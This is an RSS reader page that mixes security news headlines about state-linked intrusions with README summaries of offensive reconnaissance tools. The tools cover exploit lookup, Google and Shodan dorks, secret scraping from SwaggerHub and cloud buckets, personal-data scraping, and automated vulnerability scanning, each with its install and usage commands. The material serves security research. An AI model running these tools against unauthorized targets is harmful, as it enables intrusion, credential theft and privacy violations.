FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

China-Linked Hackers Used ROOTROT Webshell in MITRE Network Intrusion

The MITRE Corporation has offered more details into the recently disclosed cyber attack, stating that the first evidence of the intrusion now dates back to December 31, 2023. The attack, which came to light last month, singled out MITRE's Networked Experimentation, Research, and Virtualization Environment (NERVE) through the exploitation of two Ivanti Connect Secure zero-day

Sicat - The Useful Exploit Finder

By: Zion3R

Introduction

SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


SiCat Resources

Installation

git clone https://github.com/justakazh/sicat.git && cd sicat

pip install -r requirements.txt

Usage


~$ python sicat.py --help

Command Line Options:

Command Description
-h Show help message and exit
-k KEYWORD
-kv KEYWORK_VERSION
-nm Identify via nmap output
--nvd Use NVD as info source
--packetstorm Use PacketStorm as info source
--exploitdb Use ExploitDB as info source
--exploitalert Use ExploitAlert as info source
--msfmoduke Use metasploit as info source
-o OUTPUT Path to save output to
-ot OUTPUT_TYPE Output file type: json or html

Examples

From keyword


python sicat.py -k telerik --exploitdb --msfmodule

From nmap output


nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm

To-do

  • [ ] Input from nmap result from pipeline
  • [ ] Nmap multiple host support
  • [ ] Search NSE Script
  • [ ] Search by PORT

Contribution

I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



Russia Hackers Using TinyTurla-NG to Breach European NGO's Systems

The Russia-linked threat actor known as Turla infected several systems belonging to an unnamed European non-governmental organization (NGO) in order to deploy a backdoor called TinyTurla-NG (TTNG). "The attackers compromised the first system, established persistence and added exclusions to antivirus products running on these endpoints as part of their preliminary post-compromise actions," Cisco

From Deepfakes to Malware: AI's Expanding Role in Cyber Attacks

Large language models (LLMs) powering artificial intelligence (AI) tools today could be exploited to develop self-augmenting malware capable of bypassing YARA rules. "Generative AI can be used to evade string-based YARA rules by augmenting the source code of small malware variants, effectively lowering detection rates," Recorded Future said in a new report shared with The Hacker News.

Dorkish - Chrome Extension Tool For OSINT & Recon

By: Zion3R


During reconaissance phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish.
Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.


Installation And Setup

1- Clone the repository

git clone https://github.com/yousseflahouifi/dorkish.git

2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- click on Load unpacked extension button and select the dorkish folder.

Note: For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/

Features

Google dorking

  • Builder with keywords to filter your google search results.
  • Prebuilt dorks for Bug bounty programs.
  • Prebuilt dorks used during the reconnaissance phase in bug bounty.
  • Prebuilt dorks for exposed files and directories
  • Prebuilt dorks for logins and sign up portals
  • Prebuilt dorks for cyber secruity jobs

Shodan dorking

  • Builder with filter keywords used in shodan.
  • Varierty of prebuilt dorks to find IOT , Network infrastructure , cameras , ICS , databases , etc.

Usage

Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.

TODO

  • Add more useful dorks and catogories
  • Fix some bugs
  • Add a search bar to search through the results
  • Might add some LLM models to build dorks

Notes

I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty

Warning

  • I am not responsible for any damage caused by using the tool


swaggerHole - A Python3 Script Searching For Secret On Swaggerhub

By: Zion3R


IntroductionΒ 

This tool is made to automate the process of retrieving secrets in the public APIs on [swaggerHub](https://app.swaggerhub.com/search). This tool is multithreaded and pipe mode is available :)Β 

RequirementsΒ 

Β - python3 (sudo apt install python3) - pip3 (sudo apt install python3-pip) ## Installation
pip3 install swaggerhole
or cloning this repository and running
git clone https://github.com/Liodeus/swaggerHole.git
pip3 install .

Usage

   _____ _      __ ____ _ ____ _ ____ _ ___   _____
/ ___/| | /| / // __ `// __ `// __ `// _ \ / ___/
(__ ) | |/ |/ // /_/ // /_/ // /_/ // __// /
/____/ |__/|__/ \__,_/ \__, / \__, / \___//_/
__ __ __ /____/ /____/
/ / / /____ / /___
/ /_/ // __ \ / // _ \
/ __ // /_/ // // __/
/_/ /_/ \____//_/ \___/

usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]

optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
Term to search
-o OUT, --out OUT Output directory
-t THREADS, --threads THREADS
Threads number (Default 25)
-j, --json Json ouput
-q, --quiet Remove banner
-du, --deactivate_url
Deactivate the URL filtering
-de, --deactivate_email
Deactivate the email filtering

Search for secret about a domain

swaggerHole -s test.com

echo test.com | swaggerHole

Search for secret about a domain and output to json

swaggerHole -s test.com --json

echo test.com | swaggerHole --json

Search for secret about a domain and do it fast :)

swaggerHole -s test.com -t 100

echo test.com | swaggerHole -t 100

Output explanation

Normal output

Β `Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]`Β 

Json output

Β `{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}`Β 

Deactivate url/emailΒ 

Using -du or -de remove the filtering done by the tool. There is more false positive with those options.Β 

Chinese Hackers Operate Undetected in U.S. Critical Infrastructure for Half a Decade

The U.S. government on Wednesday said the Chinese state-sponsored hacking group known as Volt Typhoon had been embedded into some critical infrastructure networks in the country for at least five years. Targets of the threat actor include communications, energy, transportation, and water and wastewater systems sectors in the U.S. and Guam. "Volt Typhoon's choice of targets and pattern

After FBI Takedown, KV-Botnet Operators Shift Tactics in Attempt to Bounce Back

The threat actors behind the KV-botnet made "behavioral changes" to the malicious network as U.S. law enforcement began issuing commands to neutralize the activity. KV-botnet is the name given to a network of compromised small office and home office (SOHO) routers and firewall devices across the world, with one specific cluster acting as a covert data transfer system for other Chinese

BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R


Introducing Uscrapper 2.0, A powerfull OSINT webscrapper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, supports multithreading to make this process faster, Uscrapper 2.0 is equipped with advanced Anti-webscrapping bypassing modules and supports webcrawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.


Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website including email addresses phone numbers and usernames.

Whats New?:

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-webscrapping techniques.
  • Introducing Crawl and scrape: an advanced crawl and scrape module to scrape the websites from within.
  • Implemented Multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

Usage:

To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


Arguments:

  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.

Note:

  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some Anti-Webscrapping methods we have used selenium which can make the overall process slower.

Contribution:

Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

By: Zion3R


WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.


Features

Usage

g!2m0:~ webcopilot -h
             
──────▄▀▄─────▄▀▄
β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β• β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘β–‘β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
[●] @h4r5h1t.hrs | G!2m0

Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

Flags:
-d Add your target [Requried]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message

Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot

git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

Tools Used:

SubFinder β€’ Sublist3r β€’ Findomain β€’ gf β€’ OpenRedireX β€’ dnsx β€’ sqlmap β€’ gobuster β€’ assetfinder β€’ httpx β€’ kxss β€’ qsreplace β€’ Nuclei β€’ dalfox β€’ anew β€’ jq β€’ aquatone β€’ urldedupe β€’ Amass β€’ gauplus β€’ waybackurls β€’ crlfuzz

Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d bugcrowd.com

The -o command can be used to specify an output dir.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t command can be used to add thrads to your scan for faster result.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x command can be used to exclude out of scope domains.

g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

Example

Default options looks like this:

g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd
                                ──────▄▀▄─────▄▀▄
β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆ β–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘ β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘ β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
[●] @h4r5h1t.hrs | G!2m0


[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.


Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdoamin Scanned - [assetfinderβœ”] Subdomain Found: 34
[●] Subdoamin Scanned - [sublist3rβœ”] Subdomain Found: 29
[●] Subdoamin Scanned - [subfinderβœ”] Subdomain Found: 54
[●] Subdoamin Scanned - [amassβœ”] Subdomain Found: 43
[●] Subdoamin Scanned - [findomainβœ”] Subdomain Found: 27

[●] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdoamin Scanned - [gobusterβœ”] Subdomain Found: 11
[●] Active Subdoamin Scanned - [amassβœ”] Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[●] Vulnerabilities Scanned - [XSSβœ”] Found: 0
[●] Vulnerabilities Scanned - [SQLiβœ”] Found: 0
[●] Vulnerabilities Scanned - [LFIβœ”] Found: 0
[●] Vulnerabilities Scanned - [CRLFβœ”] Found: 0
[●] Vulnerabilities Scanned - [SSRFβœ”] Found: 0
[●] Vulnerabilities Scanned - [Sensitive Dataβœ”] Found: 0
[●] Vulnerabilities Scanned - [Open redirectβœ”] Found: 0
[●] Vulnerabilities Scanned - [Subdomain Takeoverβœ”] Found: 0
[●] Vulnerabilities Scanned - [Nuclieβœ”] Found: 0
[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


β–’β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€ β–ˆβ–€β–€ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–€β–€β–ˆβ–€β–€
β–’β–ˆβ–„β–„β–€ β–ˆβ–€β–€ β–€β–€β–ˆ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–‘β–‘β–ˆβ–‘β–‘
β–’β–ˆβ–‘β–’β–ˆ β–€β–€β–€ β–€β–€β–€ β–‘β–€β–€β–€ β–€β–€β–€ β–‘β–‘β–€β–‘β–‘

[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0

Acknowledgement

WebCopilot is inspired from Garud & Pinaak by ROX4R.

Thanks to the authors of the tools & wordlists used in this script.

@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

Warning: Developers assume no liability and are not responsible for any misuse or damage cause by this tool. So, please se with caution because you are responsible for your own actions.


CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the&nbsp;Russia-linked&nbsp;APT28&nbsp;group&nbsp;to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information. The activity, which was&nbsp;detected&nbsp;by the agency between December 15 and 25, 2023, targeted Ukrainian

Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks

Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as&nbsp;APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain

New Threat Actor 'AeroBlade' Emerges in Espionage Attack on U.S. Aerospace

A previously undocumented threat actor has been linked to a cyber attack targeting an aerospace organization in the U.S. as part of what's suspected to be a cyber espionage mission. The BlackBerry Threat Research and Intelligence team is tracking the activity cluster as&nbsp;AeroBlade. Its origin is currently unknown and it's not clear if the attack was successful. "The actor used spear-phishing

OSINT-Framework - OSINT Framework

By: Zion3R


OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.

I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!

Please visit the framework at the link below and good hunting!


https://osintframework.com

Legend

(T) - Indicates a link to a tool that must be installed and run locally
(D) - Google Dork, for more information: Google Hacking
(R) - Requires registration
(M) - Indicates a URL that contains the search term and the URL itself must be edited manually

For Update Notifications

Follow me on Twitter: @jnordine - https://twitter.com/jnordine
Watch or star the project on Github: https://github.com/lockfale/osint-framework

Suggestions, Comments, Feedback

Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on github or reach out on Twitter.

Contribute with a GitHub Pull Request

For new resources, please ensure that the site is available for public and free use.

  1. Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry.
  • Submit pull request!
  • Thank you!

    OSINT Framework Website

    https://osintframework.com

    Happy Hunting!



    Goblob - A Fast Enumeration Tool For Publicly Exposed Azure Storage Blobs

    By: Zion3R


    Goblob is a lightweight and fast enumeration tool designed to aid in the discovery of sensitive information exposed publicy in Azure blobs, which can be useful for various research purposes such as vulnerability assessments, penetration testing, and reconnaissance.

    Warning. Goblob will issue individual goroutines for each container name to check in each storage account, only limited by the maximum number of concurrent goroutines specified in the -goroutines flag. This implementation can exhaust bandwidth pretty quickly in most cases with the default wordlist, or potentially cost you a lot of money if you're using the tool in a cloud environment. Make sure you understand what you are doing before running the tool.


    Installation

    go install github.com/Macmod/goblob@latest

    Usage

    To use goblob simply run the following command:

    $ ./goblob <storageaccountname>

    Where <storageaccountname> is the target storage account to enumerate public Azure blob storage URLs on.

    You can also specify a list of storage account names to check:

    $ ./goblob -accounts accounts.txt

    By default, the tool will use a list of common Azure Blob Storage container names to construct potential URLs. However, you can also specify a custom list of container names using the -containers option. For example:

    $ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt

    The tool also supports outputting the results to a file using the -output option:

    $ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt -output results.txt

    If you want to provide accounts to test via stdin you can also omit -accounts (or the account name) entirely:

    $ cat accounts.txt | ./goblob

    Wordlists

